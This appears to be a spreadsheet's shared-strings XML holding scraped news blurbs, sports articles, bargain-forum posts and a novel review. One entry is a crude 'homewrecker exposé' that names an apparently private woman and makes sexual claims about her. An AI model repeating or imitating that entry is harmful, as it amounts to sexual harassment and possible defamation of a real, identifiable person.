didn’t see everything, so a full visit can probably soak up a whole day. The one set of tunnels I admittedly skipped were the WW2 tunnels, as the queue was long and by now my feet were sore. That’s for another day. Oh, and if there ever was a town that merited a funicular railway, Dover is that town. Dover Castle is managed by English Heritage and open daily. Entry is £23 for adults, or free for English Heritage members.</t>
  </si>
  <si>
    <t>Oriena Vuong</t>
  </si>
  <si>
    <t>Officers responded just before 4 p.m. on Oct. 5 to the Franceschini Bridge, located over Highway 410 between Williams Parkway and Bovaird Drive.</t>
  </si>
  <si>
    <t>They’re technically extinct in NSW, but – 800 kilometres southwest of Sydney – 30 bilbies are now roaming the Mallee Cliffs National Park.</t>
  </si>
  <si>
    <t>Why train your dog with food rewards? A growing body of research says it's the easiest and most effective way to train.</t>
  </si>
  <si>
    <t>Investors didn't know what to believe about the state of US-China trade talks on Thursday.</t>
  </si>
  <si>
    <t>Downtown Los Angeles California Credit Repair | (888) 630-5917 Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. Allow bankruptcy courts to adjust student loansAmericans have taken out over $1.6 trillion in... Wednesday 09 October 2019 07:34 AM UTC-05 Allow bankruptcy courts to adjust student loans Americans have taken out over $1.6 trillion in student loan debt — far exceeding the amount of credit card debt, with an average bachelor's degree … http://dlvr.it/RFqTyK</t>
  </si>
  <si>
    <t>How much does a trip to Japan cost? ★ Deeper Meaning The post How much does a trip to Japan cost? ★ Deeper Meaning appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Jetstar Return fares to Japan, eg: Examples From Melbourne: From Melbourne $395 – 20 May to 29 May – https://bookings.beatthatflight.com.au/flights/mel2005tyo290... $395 – 20 May to 30 May – https://bookings.beatthatflight.com.au/flights/mel2005tyo300... $395 – 20 May to 02 Jun – https://bookings.beatthatflight.com.au/flights/mel2005tyo020... $405 – 19 May to 30 May – https://bookings.beatthatflight.com.au/flights/mel1905tyo300... Examples From Sydney: $354 – 20 May to 01 Jun – https://bookings.beatthatflight.com.au/flights/syd2005tyo010... $354 – 17 May to 22 Jun – https://bookings.beatthatflight.com.au/flights/syd0906tyo220... $371 – 17 May to 02 Jun – https://bookings.beatthatflight.com.au/flights/syd1705tyo020... $374 – 28 Apr to 28 May – https://bookings.beatthatflight.com.au/flights/syd2804tyo280... $374 – 09 Jun to 19 Jun – https://bookings.beatthatflight.com.au/flights/syd0906tyo190... $375 – 09 Jun to 23 Jun – https://bookings.beatthatflight.com.au/flights/syd0906tyo230... and plenty more exist. Checked bags and food not included, and flights stop in either Cairns/Gold Coast enroute. Have done this trip before from Sydney, the Dreamliner was very comfy, and came prepared with my own entertainment. Beat That Flight For more deals like this from Beat That Flight, visit our site - sign up for updates, deals, flight hacks and error fares, or follow us on Facebook or on twitter. Deals from Sydney, Deals from Melbourne, Deals from Adelaide, Deals from Canberra, Deals from Perth, Deals from Darwin, Deals from Cairns, Deals from Brisbane, Deals from Hobart We have an app now too, if you're on Android! Do you look for flights using Google Chrome?</t>
  </si>
  <si>
    <t>The Philadelphia Eagles look to keep rolling when they host the New York Jets on Sunday at Lincoln Financial Field. Philadelphia is 2-2 overall and 1-1 at home, while the Jets are 0-3 overall and 0-1 on the road. The Eagles are coming off an impressive road victory over the Green Bay Packers, while the Jets have yet to win a game this season and are coming off a 16-point defeat against the New England Patriots. Kickoff for Jets vs. Eagles is set for 1 p.m. ET. Philadelphia is a 14-point favorite in the latest Jets vs. Eagles odds, while the over-under for total points scored is 43.5. Before you make any Jets vs. Eagles picks and NFL predictions for Week 5, you’ll want to see what the SportsLine Projection Model is saying. The model, which simulates every NFL</t>
  </si>
  <si>
    <t>Marty McCarthy</t>
  </si>
  <si>
    <t>An Adelaide start-up could soon be producing drinking straws made with Australian-grown straw, replacing the need for plastic ones.</t>
  </si>
  <si>
    <t>Sean Longstaff signed a new contract only 10 months ago. However, Newcastle United are desperate to get the midfielder to commit to a new enhanced far longer deal. The December...Sean Longstaff signed a new contract only 10 months ago. However, Newcastle United are desperate to get the midfielder to commit to a new enhanced far longer deal. The December... You can click here to read the full article. The post Newcastle United problems agreeing new contract with Manchester United target Sean Longstaff – Report appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>ktahni posted a photo: My name is KTahni and this is one of the first</t>
  </si>
  <si>
    <t>A hacking group that appears to be linked to the Iranian government attempted to intrude into a US presidential contender's campaign, Microsoft says.</t>
  </si>
  <si>
    <t>Each of Brittney’s b*****s is larger than her head and she blames always being on her back on her tig ol’ bitties, says it’s easier to bear the load. Guys drop loads all over her t**s and face. She sends nudes and waits for the calls, cheaters can’t help themselves. Sometimes she works out of her sister’s garage, where she serviced one cheater for the entire time his wife was pregnant. They didn’t name the kid after her, but dude kind of liked the idea, a way to remember all those loads he dropped on Brittney. He had to give her up, got caught and had to change diapers. She lost that steady dripper. The post Brittney Norris — Indiana – Expose Homewreckers appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Saveur correspondent Michelle Heimerman spent some time island hopping around French Polynesia and captured life in Tahiti, Moorea, Taha’a, and Rangiroa. Here’s what she saw (and ate). The post The Real Food of Tahiti appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>BigSalad</t>
  </si>
  <si>
    <t>As per the title! Just noticed this in my Amex offers. Obviously targeted! Can use up to 2 times.</t>
  </si>
  <si>
    <t>Beijing's sensitivity about China’s borders is no secret. But the Hong Kong protests are turning up the volume on the global outrage machine.</t>
  </si>
  <si>
    <t>Richard Keys slams Rafa Benitez for his ‘constant moaning’ at Newcastle United – and claims he tried to leave for Everton twice This post written by Chris Knight originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Australia has been urged to take a more humane approach to asylum seekers but not dismiss those pushing back against refugees as bigots or racists.</t>
  </si>
  <si>
    <t>In the fog of Brexit uncertainty, UK GDP growth has been undermined by lack of business investmentOne of the confusing trends since the Brexit referendum vote can be found in the official measure of national income or GDP. A glance at the data since 2016 reveals a series of ups and downs from quarter to quarter, and very little in the way of a trend.The low points conform to the argument that Brexit was a disaster for the economy, while the mini-recoveries play to the Brexiters’ charge that “project fear” amounted to no more than a childish scare tactic. This year has proved to be little different. Stockpiling by businesses before the first Brexit deadline in March boosted the first-quarter GDP number before a slump in the second quarter. Continue reading… Read More</t>
  </si>
  <si>
    <t>Penguin, 1992, 590 p. In a post-environmental disaster, post-nuclear war world dominated by commercial multis Shira Shipman has returned to her domed home of Tikva after Y-S, the multi she worked for, awarded custody of her son, Ari, to her husband. In Tikva she finds that Avram has created a(n illegal) cyborg, Yod, named for the tenth letter of the Hebrew alphabet. (He – Piercy depicts Yod as male and to all intents and purposes fully human – has had nine less successful predecessors.) Shira’s grandmother Malkah has helped Avram to construct Yod’s persona as the previous efforts had lacked, for want of a better word, humanity. Complicating Shira’s return is the presence of Avram’s son, Gadi, Shira’s first lover and a producer of computer generated entertainment, but who is constitutionally incapable of keeping himself to one woman. There is an ongoing effort to keep Yod’s nature secret within Tikva, always under threat of attack by information pirates, and to prevent Y-S from gaining control of him for itself. Paralleling this narrative and taking up one out of every three of the book’s chapters we are treated to the story of the golem of Prague (called Joseph,) created by Rabbi Loew to protect the Prague ghetto’s inhabitants from their gentile neighbours. This is presented as if Malkah is telling it to Yod and is interesting enough but is really meant as a counterpoint to Tikva’s situation – though there are perhaps too many similarities between the two strands of the book (the would-be independent woman in Prague, Chava, is what Malkah considers herself to be) – and also to act as an illustration of the struggle against the perennial prejudice Jewish people have suffered throughout history. The inhabitants of Tikva seem all to be Jews but that is more or less incidental to the plot in those sections, whereas in Prague it is the central consideration. The contest between Shira and Y-S for custody of Ari and of Tikva with Y-S makes up the meat of the plot and provides most of the science-fictional interest – she and Yod themselves undertake what is in effect a cyber attack on Y-S, very William Gibson – but these are in many ways the least satisfying aspects of the novel as Piercy is considering what it might mean to be Jewish (Jewish words and customs are liberally sprinkled through both strands) and, in the characters of Yod and Joseph, interrogating what it means to be human. While Joseph and Chava do not, Yod and Shira become close and eventually lovers. Yod is of course more accomplished than either Gadi or Shira’s husband ever were – or could be. In one of their conversations Shira tells Yod telepathy is a prominent human fantasy – usually of women, who wish they could understand what men want and tell men what they want. Not that their relationship, and that of Shira with Malkah, is without complication. This is a fully fleshed out narrative, more intricate than I have room to set down here. It’s easy to see why it won the Clarke Award in 1993. I noticed the phrase, “my wee installation.” Is there perhaps a Scottish influence on Piercy there? Pedant’s corner:- The publication date given is 1992 but the author information tells us this won the Clarke Award in 1993, so it must be a later reprint. Otherwise; Fernandez’ (Fernandez’s,) hung (several times, hanged,) “a epiphenomenon” (an epiphenomenon,) “conveyer belt” (conveyor belt,) “Each people has their own road, their own destiny” (has its own road, its own destiny. People is treated as singular two lines below this!) “If she were Gadi, she would not be careless in turning his back to Yod” (if she were, then she would not be careless in turning her back,) “a group of Jews … follow after” (a group … follows after,) “the doctor yanks it free as she streams, the blood spurting out” (as she screams,) “to staunch the rush of blood” (stanch.) “Malkah shuffled after here” (after her.) “Because the house disapproved of him so strongly she wondered sometimes if an occasional message did not get lost” (she wondered sometimes if an occasional message got lost,) “eighteen hundred point fifteen hours” (eighteen hundred point one five hours – especially as this is an AI [the house] speaking,) plasticene (plasticine.)</t>
  </si>
  <si>
    <t>The tram that derailed in Kew on Sunday has come off the track at least twice before – on one occasion smashing through a sleeping man's bedroom.</t>
  </si>
  <si>
    <t>Oil prices slipped for a third consecutive session on Wednesday as tensions escalated between the United States and China prior to this week's trade talks, raising uncertainties for global economic growth and oil demand.</t>
  </si>
  <si>
    <t>2:47 PM ET Forward Pascal Siakam has agreed to a four-year, $130 million maximum rookie contract extension, agents Todd Ramasar and Jaafar Choufani told ESPN. Siakam, considered the cornerstone of the Raptors’ future, is the third player in the 2016 NBA draft class to agree to a maximum contract — along with the Philadelphia 76ers‘ Ben Simmons and Denver Nuggets‘ Jamal Murray. The sides completed on the extension on Saturday afternoon, ahead of Monday’s 6 p.m. ET deadline for 2016 draft class extensions. Siakam is one of the Raptors’ great scouting and player development success stories. A 27th overall pick who started playing basketball at 16 years old in Cameroon, Siakam was voted the NBA’s Most Improved Player a year ago and played an integral part in Toronto’s first NBA championship. He averaged 19.8 points, 7.5 rebounds, 3.7 assists and 0.7 blocks per game in the NBA</t>
  </si>
  <si>
    <t>Welcome to the “Meet the Monster Berry Family” page. The Monster Berry Family are a fun but spooky family of… The post Meet the Monster Berry Family appeared first on Storyland.</t>
  </si>
  <si>
    <t>Police say two men were robbed on Friday, Aug. 30 at Main Street West and Osler Drive.</t>
  </si>
  <si>
    <t>Kristy Sexton-McGrath</t>
  </si>
  <si>
    <t>One squid, most likely the diamondback squid, lays an estimated 40,000 free-floating eggs into Great Barrier Reef waters, in a rare event for the species that experts say lives fast and dies young.</t>
  </si>
  <si>
    <t>Strictly Come Dancing aired a shocking results show over the weekend as Dev Griffin and Dianne Buswell were eliminated from the competition. They went up against Emma Weymouth and Aljaž Škorjanec in the dance off but were unanimously removed from the competition. However, reports have emerged suggesting there was some backstage drama including Viscount Weymouth. Emma’s husband, Ceawlin Thynn, was said to have become “agitated” while watching the results, according to The Sun. An unknown source told the publication: “He was hopping mad – it made a real scene. “Everyone had had a few drinks so the volume levels were high. READ MORE: Strictly Come Dancing 2019 Week 5 songs and dances: Full list revealed However, the Radio One presenter’s sultry routine didn’t win favour among judges. Craig Revel Horwood, Motsi Mabuse and Bruno Tonioli all voted to save Emma. Shirley Ballas agreed she would have done the same thing if her vote counted. Speaking about his exit, Dev said: “I am not going to lie I am absolutely gutted, but learning how to dance, hanging out with Dianne and the other pros and celebs… I’ve absolutely loved it.” Source link</t>
  </si>
  <si>
    <t>Captain Troy Deeney claims he will be back with Watford sooner than anticipated Original Source Watford captain Troy Deeney has said he can see the light at the end of the tunnel as he nears a return to first team football. The skipper underwent knee surgery in mid-August, but is now back in the gym and running on a treadmill. Ahead of the Hornets’ return from an international break this weekend, Deeney spoke to the club website about the prospect of returning and said there will soon be no stopping him. “I know when I’m aiming to be back, it’s not too far away now,” he said. “I’m just starting to see the light at the end of the tunnel. They are holding me back for my benefit, but when they let me go there will be no stopping me, so they are just trying to rein me in until it’s safe medically and then I’ll be going and pushing myself. “I’m just ready for it. I know what to expect and that I will have to fight for my place. I don’t think there’ll be any playing 45 minutes for the Under-23s first. I’ll be expected to go straight in and I’m ready for everything that is coming.” Despite an end to his time out of the first team on the horizon, Deeney admits he is still a bit frustrated at not being able to push himself as much as he would like. However, the skipper said he trusts the medical team and is willing to listen to their judgement as they try and get him back playing as soon as they can. “I’ve been doing running in the pool, so the mechanics didn’t feel too unusual,” he said. “I’m running at half body weight and I want to do more, but they are holding me back for the right reasons. It’s exciting but I also get frustrated as I want to do more and do the next thing. “I understand the process, though, and the medical staff are looking after me really well, so we’ve knocked another week off [of the recovery time]. I think they are a week or ten days away from letting me go and run properly outside. “They took the last bit of fluid out of the knee. It was 100ml last time, which was quite a lot, but this time it was only 23ml. I also had something put in to help lubricate the knee. It feels great, it feels brand new. It’s good. Things are going well.”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Captain Troy Deeney claims he will be back with Watford sooner than anticipated appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>m0nk3d</t>
  </si>
  <si>
    <t>Cheapest price for these. I haven't used them myself, but they seem to get really good reviews. The Sennheiser RS 175 is a perfect complement to your home entertainment system. This digital wireless headphone delivers exceptional sound quality and freedom from wires. The ergonomic around ear, closed back design reduces background noise while providing an exceptionally comfortable fit. You’ll be immersed in the sound of your favorite music, TV or movies without disturbing anyone else in the room! Do not expose to moisture</t>
  </si>
  <si>
    <t>A gin boss is facing claims that he fraudulently obtained alcohol licences from the council.</t>
  </si>
  <si>
    <t>Disney Trip 2019 Part 1 The post Disney Trip 2019 Part 1 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Unavailable</t>
  </si>
  <si>
    <t>Xiaomi Mi 9 Lite 6GB/128GB Dual Sim - Black &amp; Blue Got email confirmation from Catch "The seller has now responded and they have advised that this version is the International Global ROM so it is not flashed. I hope this information has been helpful" It has • NFC • IR Blaster • Dual SIM • MicroSD card slot • B28 • 32 MP selfie cam More specifications you can find here Overall it's better than Mi 9 SE. If you still have AMEX offer than it will reduce $15 from the price. Cheers</t>
  </si>
  <si>
    <t>heyimsu</t>
  </si>
  <si>
    <t>Currently on special for $179.00 in-store until 9-Oct-19. 20% off on eBay makes it even more sweeter. Don’t forget additional 1% off via cashback through ShopBack which brings it down to $141.41 Original Coupon Deal</t>
  </si>
  <si>
    <t>Come along to the ACM Live Stage at Tobacco Dock, from Thursday 31st October to Saturday 2nd November, and join us for industry masterclasses and student performances from our Metropolis Blue and Metro Sound labels… Whether you love performing, creating or managing music behind the scenes, BBC Music Introducing LIVE is the perfect opportunity for artists or aspiring music industry professionals to immerse themselves into the market. Across the event there will be BBC Presenters and DJs, global and new artists including Catfish and the Bottlemen, Nile Rodgers, Annie Mac, Izzy Bizu, Blossoms, Georgia and more to help you make it in the music industry. The event will be held at Tobacco Dock – Wapping Ln, St Katharine’s &amp; Wapping, London E1W 2SF. Check out the BBC Music Introducing Live website for more information here. ACM Live Stage – Lineup Confirmed: Check out our playlist featuring some of these artists: The post BBC Music Introducing LIVE @ Tobacco Dock: 31/10/19 – 02/11/19 appeared first on ACM.</t>
  </si>
  <si>
    <t>WASHINGTON — A second intelligence official who was alarmed by President Trump’s dealings with Ukraine is weighing whether to file his own formal whistle-blower complaint and testify to Congress, according to two people briefed on the matter. The official has more direct information about the events than the first whistle-blower, whose complaint that Mr. Trump was using his power to get Ukraine to investigate his political rivals touched off an impeachment inquiry. The second official is among those interviewed by the intelligence community inspector general to corroborate the allegations of the original whistle-blower, one of the people said. The inspector general, Michael Atkinson, briefed lawmakers privately on Friday about how he substantiated the whistle-blower’s account. It was not clear whether he told lawmakers that the second official is considering filing a complaint. A new complaint, particularly from someone closer to the events, would potentially add further credibility to the account of the first whistle-blower, a C.I.A. officer who was detailed to the National Security Council at one point. He said that he relied on information from more than half a dozen American officials to compile his allegations about Mr. Trump’s campaign to solicit foreign election interference that could benefit him politically. Additionally, a reconstructed transcript of a July call between Mr. Trump and President Volodymyr Zelensky released by the White House also showed Mr. Trump pressuring Ukraine. Because the second official has met with Mr. Atkinson’s office, it was unclear whether he needs to file a complaint to gain the legal protections offered to intelligence community whistle-blowers. Witnesses who speak with inspectors general are protected by federal law that outlaws reprisals against officials who cooperate with an inspector general. Whistle-blowers have created a new threat for Mr. Trump. Though the White House has stonewalled Democrats in Congress investigating allegations raised in the special counsel’s report that Mr. Trump obstructed justice, the president has little similar ability to stymie whistle-blowers from speaking to Congress. The Trump administration had blocked Mr. Atkinson from sharing the whistle-blower complaint with lawmakers but later relented. Mr. Trump and his allies have taken aim at the credibility of the original whistle-blower by noting that he had secondhand knowledge. The president has also singled out his sources, saying that they were “close to a spy.” “I want to know who’s the person who gave the whistle-blower the information because that’s close to a spy,” Mr. Trump told staffers at the United States mission to the United Nations. “You know what we used to do in the old days when we were smart with spies and treason, right? We used to handle it a little differently than we do now.” Mr. Atkinson has identified some indications of “arguable political bias” that the whistle-blower had in favor of a rival candidate. But the inspector general said that the existence of that bias did not alter his conclusion that the complaint was credible. Still, testimony from someone with more direct knowledge of Mr. Trump’s efforts to use American foreign policy for potential political gain would most likely undermine conservatives’ attacks on the C.I.A. officer’s credibility. The House Intelligence Committee has taken the lead on the investigation into the whistle-blower’s claims as part of the impeachment inquiry into whether Mr. Trump abused his powers by using high-level diplomacy to advance his personal interests. Committee aides were still trying to arrange an interview with the C.I.A. officer. Among the matters the president asked Mr. Zelensky to examine were a Ukrainian natural gas company connected to Hunter Biden, the son of former Vice President Joseph R. Biden Jr. Mr. Trump has said publicly since the release of the complaint that the matter should be examined and added on Thursday that the Chinese government should look at dealings that Hunter Biden had there. Nicholas Fandos contributed reporting. Source link</t>
  </si>
  <si>
    <t>‘He said that last year, how is that not what he’s doing now?’</t>
  </si>
  <si>
    <t>"Instincts kicked in and I just ran over there," Zac Clark said. "I just thought I had to get the car off of him."</t>
  </si>
  <si>
    <t>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Newcastle must look at Bournemouth winger Ryan Fraser in January Posted By: PL News October 12, 2019 With his contract at Bournemouth set to expire next summer, Ryan Fraser is going to be a man in demand. The Scottish winger could potentially leave Dean Court for a cut price fee in January, or for absolutely nothing at the end of the season. He was reportedly a target for Arsenal in the summer, while the Magpies were also loosely credited with an interest. (Photo by Robin Jones – AFC Bournemouth/AFC Bournemouth via Getty Images) Whether they were or weren’t keen, Newcastle need to be interested in January. Fraser is one of the best players outside of the top six and would certainly boost Steve Bruce’s attacking ranks. Other than Miguel Almiron and Allan Saint-Maximin, we don’t really have many great wide options who can change a game. But Fraser can do exactly that. The 25-year-old scored seven goals for the Cherries last season, but his assist record is even more impressive. He directly set up 14 goals in the Premier League, with only Eden Hazard managing more in the entire division. (Photo by Robin Jones – AFC Bournemouth/AFC Bournemouth via Getty Images) He’s reportedly been offered a new contract to stay at Bournemouth, but he is yet to sign on the dotted line. He can run down his contract and leave on a free, or Bournemouth may decide to cash in while they can and get at least some money for him in January. Fraser is the kind of player who can take Newcastle to the next level. Going forward we’ve been woeful, but the former Aberdeen lad has shown that he can be lethal on the counterattack, which is exactly how the Magpies seem to be trying to play under Bruce. (Photo by Robin Jones – AFC Bournemouth/AFC Bournemouth via Getty Images) Is Newcastle a step up from Bournemouth? In terms of club stature, yes. But in terms of being stable in the Premier League? No. But if Fraser has his heart set on leaving the south coast, then Newcastle need to make a play for him and try and convince the midfielder that St James’ Park is the place for him. Have something to tell us about this article? window.fbAsyncInit = function() FB.init( status: true, xfbml: true, version: ‘v2.3’ ); ; (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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The post Newcastle must look at Bournemouth winger Ryan Fraser in January appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>andymatter</t>
  </si>
  <si>
    <t>*Delivery has exclusions;1 additional eligible items are $0. Get some angry juice up ya! Great price on the large bottle. Already discounted 16% before adding the code. First distilled in 1888, Bundaberg Rum is as Australian as it gets. Aged for a minimum of two years, this great rum made from 100% Queensland sugar cane shows evocative flavours of molasses and caramel. Conveniently packaged in a 1.125 Lt bottle. The 700ml is on also on special at 11% off before applying the code. Cheers. Original Coupon Deal Delivery excludes: Northern Territory, QLD Far North, QLD Regional, QLD South East, SA Regional, Tasmania, WA Regional, WA Remote, PO Box ↩</t>
  </si>
  <si>
    <t>Sydney Morton</t>
  </si>
  <si>
    <t>"He's very heavy to push, so it's helped me a lot.",</t>
  </si>
  <si>
    <t>Heartbroken small business owners are devastated after ending a long day’s work to discover a beloved “family member” wasn’t in his bed.</t>
  </si>
  <si>
    <t>Melbourne United guard Chris Goulding and Phoenix forward Mitch Creek will be ready to fire in Thursday night's NBL season opener at Melbourne Arena.</t>
  </si>
  <si>
    <t>A 35-year-old man has been charged with three counts of murder and has appeared in court. Read more? Click here</t>
  </si>
  <si>
    <t>Susanna McArdle</t>
  </si>
  <si>
    <t>Located along Qinhuangdao’s picturesque Gold Coast in China, sits the art gallery Aranya. Shanghai-based architects, Neri&amp;Hu, have designed this stunning art centre inside the seaside resort community. Like an impenetrable rock, sitting firmly in the shifting environment, the exterior of the gallery is composed of concrete in various textures. The façade and materiality of the building is heavy in nature, but smooth surfaces reflect the changing skies, while the moulded modular units pick up on the play of shadows throughout the day. “Aranya as a community has a strong emphasis on the spiritual nature of their lifestyle ideology, a oneness with the environment,” said Neri&amp;Hu. “The design scheme is as much about the internal courtyard, a communal space for the residents, as it is about the exhibition being displayed in the centre.” Drawing inspiration from the seasonal ocean waters nearby—azure and calm in the summers, splintered ice though winter—the building design attempts to encapsulate the natural wonder of water at its core. The scheme maximises its outer footprint but carves out a pure conical geometry at the centre with a stepped amphitheatre at the base. The central void can be reconfigured and used in many ways; a water feature when filled with water, or a functional performance and gathering place when the water is drained. The exhibition galleries above benefit from the public space integration, making the project much more than just a place for display, but also a place for sharing. Related: HUB Performance &amp; Exhibition Centre in Shanghai by Neri&amp;Hu. Within the thick mass of the building volume is a series of interlocking spaces that visitors can meander freely within, slowly ascending, enjoying a choreographed journey with directed views both inward and outward. Gallery interiors are about the enjoyment of art. This project is no different in that regard – a spiralling path leads through all the spaces, urging visitors onwards by the desire to see more. Starting at the bottom with the Café, Multi-purpose Gallery, and an Outdoor Amphitheatre, the path crosses through five distinct galleries, culminating at the rooftop with 360-degree viewing of the activities below. The building is a jewel in the crown of this seaside community. Bronze elements act as accents on the heavy façade to catch the light and draw attention to the entry of each gallery. Custom lighting and details add a touch of intricacy to the otherwise modest palette. In the evening, open modules allow light to shine through. Aranya Art Centre makes the most of modern of architecture—it takes a masculine, strong external form while applying the lightness and feminine qualities for the interior, reflecting the spiritual connection to the sea it overlooks. The post Aranya Art Center in Qinhuangdao, China by Neri&amp;Hu. appeared first on Yellowtrace.</t>
  </si>
  <si>
    <t>Marco Silva faces continued midfield frustration as Everton manager looks to key men to reignite campaign Original Source Marco Silva may feel as though it doesn’t rain at Finch Farm anymore but pours. And pours and pours. A quadriceps injury meant Jean-Philippe Gbamin was never going to be an option for the embattled Everton manager as he prepares for a crunch game at home to West Ham this weekend, but the news that he will be out until January, was the last thing he needed. Silva already expects to be without Fabian Delph because of a hamstring problem. It once again leaves the Blues boss with the prospect of having to patch up and send out a midfield that is far from ideal. Given Gbamin’s extended absence, Silva would like to partner Andre Gomes and Delph, as he did in the win over Wolves, but as one peels himself off the treatment table, the other slumps down on it. Everton are expected to at least look at what the January transfer window could offer them in terms of reinforcements. When Gbamin is fully fit he intends to start using a 4-3-3 formation in certain games but for now, and on Saturday, Gomes is likely to start alongside Morgan Schneiderlin. Marcel Brands has faced tough questions before and can provide the same solutions at Everton HERE It is just one of a number of issues making life increasingly difficult for Silva as he attempts to drag his team out of a four-game losing streak and shield himself from the heat which has been turned up. The Portuguese coach knows of the need for a reaction – and a result – this weekend but he goes into it retaining the support of those in the boardroom, speaking with Farhad Moshiri again last week, and believing the hierarchy share his belief that stability and patience are required. The next three games are, of course, seen as important but Silva has not been told they will make or break his time at Everton. A place in Europe, an improved league position on last term and a better run in both of the domestic cup competitions are the club’s targets this season. Silva knows that immediate and significant improvements are essential, of course, and though he will only have two days to work with his full squad as they return from international duty (having only had eight senior players at training earlier in the week), one of his key messages will be for his players to make a fast start against West Ham. He shares the frustrations that his team have been too laboured in their attacking play of late, pedestrian, lacking tempo and taking too long to release the ball. The second-half performance in the defeat to Sheffield United still rankles with him. Gylfi Sigurdsson and Lucas Digne of Everton (Image: Tony McArdle/Everton FC via Getty Images) Is Gylfi Sigurdsson part of that problem? For many he is. The player has acknowledged his slow start and though last season’s formation was designed to get the best out of him, it is understood the team is not built around the club record signing. Sigurdsson is not untouchable. The Everton boss is well aware of how, especially at Goodison, a high-octane start – and an early goal – can set the mood for the rest of the afternoon and how much this group of players feed off a buoyant atmosphere. Conscious of that from before he joined the club, the 42-year-old was part of discussions over the introduction of the pre-match siren and flags and believes in the power of the Old Lady when in full voice. Following the 0-0 draw in March’s derby, he said that an atmosphere in or around that level will mean that “30 or 40 per cent of our job is done.” Of course, Everton’s players have to be able to cope with moans, groans and lulls in atmosphere as well as help revive it when it drops. Read More Must-read Everton FC news It has always been, and remains, a two-way street. Silva needs Sigurdsson and Richarlison, in particular, to rediscover their form this weekend as the search for goals goes on. Everton have scored the third fewest in the league this season with six and while much of the spotlight and pressure falls on the shoulders of Dominic Calvert-Lewin and Moise Kean, Silva is expecting last season’s joint top scorers, plus Bernard and Alex Iwobi, to share the burden. Calvert-Lewin has taken on the No9 shirt this season and scored four goals in seven starts in all competitions, but is developing as a centre-forward while patience is required with Kean, who is new to the league and arrived having played only a handful of times in Serie A last term. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now Silva, it is known, had put Mario Mandzukic’s name on the table as an experienced option in he summer but it appears the Juventus target-man did not fit in with the club’s new transfer strategy of investing significant sums in younger players with potential and re-sale value. Calvert-Lewin and especially Kean need time to improve and work with Silva at Finch Farm so the expectation from the manager is that the more experienced forwards will pick up the slack. It is a view shared by many inside the club who believe this group of players need to take responsibility for the poor start to the season as much as the manager.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Marco Silva faces continued midfield frustration as Everton manager looks to key men to reignite campaign appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Jonty766</t>
  </si>
  <si>
    <t>Use an extra adapter for home or work. The Apple 60W MagSafe 2 Power Adapter is made specifically for your MacBook Pro with 13-inch Retina display. Its held in place magnetically, so if someone should trip over it, the cord disconnects harmlessly and your notebook stays put safely. Thanks to pricehipster</t>
  </si>
  <si>
    <t>Note from GSAK author: "There are factors involved (mainly my stroke issues) which brings an end to the commercial version of GSAK" GSAK is now Freeware! GSAK is the all in one Geocaching and waypoint management tool. Major features include: Multiple databases, sending/receiving waypoints to GPSr, Leaflet maps, Geocaching.com live api, online logging, conversion to many mapping formats, HTML output, extensive searching, macro support, backup and restore, distance/direction from other waypoints (including caches, locations, post codes) and much more. GSAK only runs on Windows operating systems (Windows 7, Windows 8, Windows 10, with XP and below not supported). Under the covers GSAK uses GPSBabel For a more complete feature set please click here For a screen shot of GSAK click here The version history for the latest updates can be found here. The version history for the full version can be found here. There is also a GSAK 101 getting started guide that you can download from here Need help? GSAK has its own support forum. Go here https://gsak.net/board Credit to mydealz</t>
  </si>
  <si>
    <t>When Canberra romped away with the 1994 premiership, few could have imagined it would take the Green Machine a quarter of a century to play off for the title again.</t>
  </si>
  <si>
    <t>UK’s progress in cutting greenhouse gas emissions slows – Ofgem Original Source The UK’s progress in reducing greenhouse gas emissions slowed last year, Ofgem has said. The UK continues to be a global leader but greenhouse gases fell by 2.5% last year, down from 3% the previous year and the smallest reduction since 2012, according to the regulator’s annual state of the market report. It warned that “significant” investment and policy intervention, particularly in renewables, would be needed to meet the UK’s legal goals of reaching net zero emissions by 2050. Greenhouse gas emissions have fallen by 42% since 1990, more than any other large advanced economy, due largely to the decarbonisation of electricity generation, Ofgem said. Transport continued to be the largest single source of carbon emissions, although these fell slightly last year (3%), partly down to an increase in the number of alternative fuel vehicles which now account for 2% of the licensed cars on the road. Ofgem has made decarbonising the economy a priority in its new corporate strategy and has promised to set out more detail on this early next year. Joe Perkins, chief economist at Ofgem, said: “Ofgem’s latest state of the market report shows the progress made so far to decarbonise the economy but much more needs to be done. “We want the UK to remain a global leader in bringing down greenhouse gas emissions, and our major objective is to help the country rise to the challenge of cutting emissions to net zero by 2050 at the lowest possible price to consumers. “As well as protecting consumers in the future, our duty is also to protect those today. “We will continue to enable competition and innovation which benefits consumers, whilst protecting those who need it, as we help build an energy market which works for all consumers.” Citizens Advice chief executive Gillian Guy said: “The fact that cuts to carbon emissions are slowing down when they should be accelerating brings the Government’s decision to legislate for net zero by 2050 into sharp relief. “Much of the current debate is focused on the technical questions of how this can be achieved. But there is another public conversation which needs to be had – who pays for the transition to a low-carbon economy and how do they pay? “Current efforts to decarbonise are largely paid for through people’s bills – an approach which disproportionately hits the poorest in society. We cannot get these difficult decisions about decarbonisation wrong, because it will be those who can least afford it who will pay the price.”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UK’s progress in cutting greenhouse gas emissions slows – Ofgem appeared first on Sky-News. Source link</t>
  </si>
  <si>
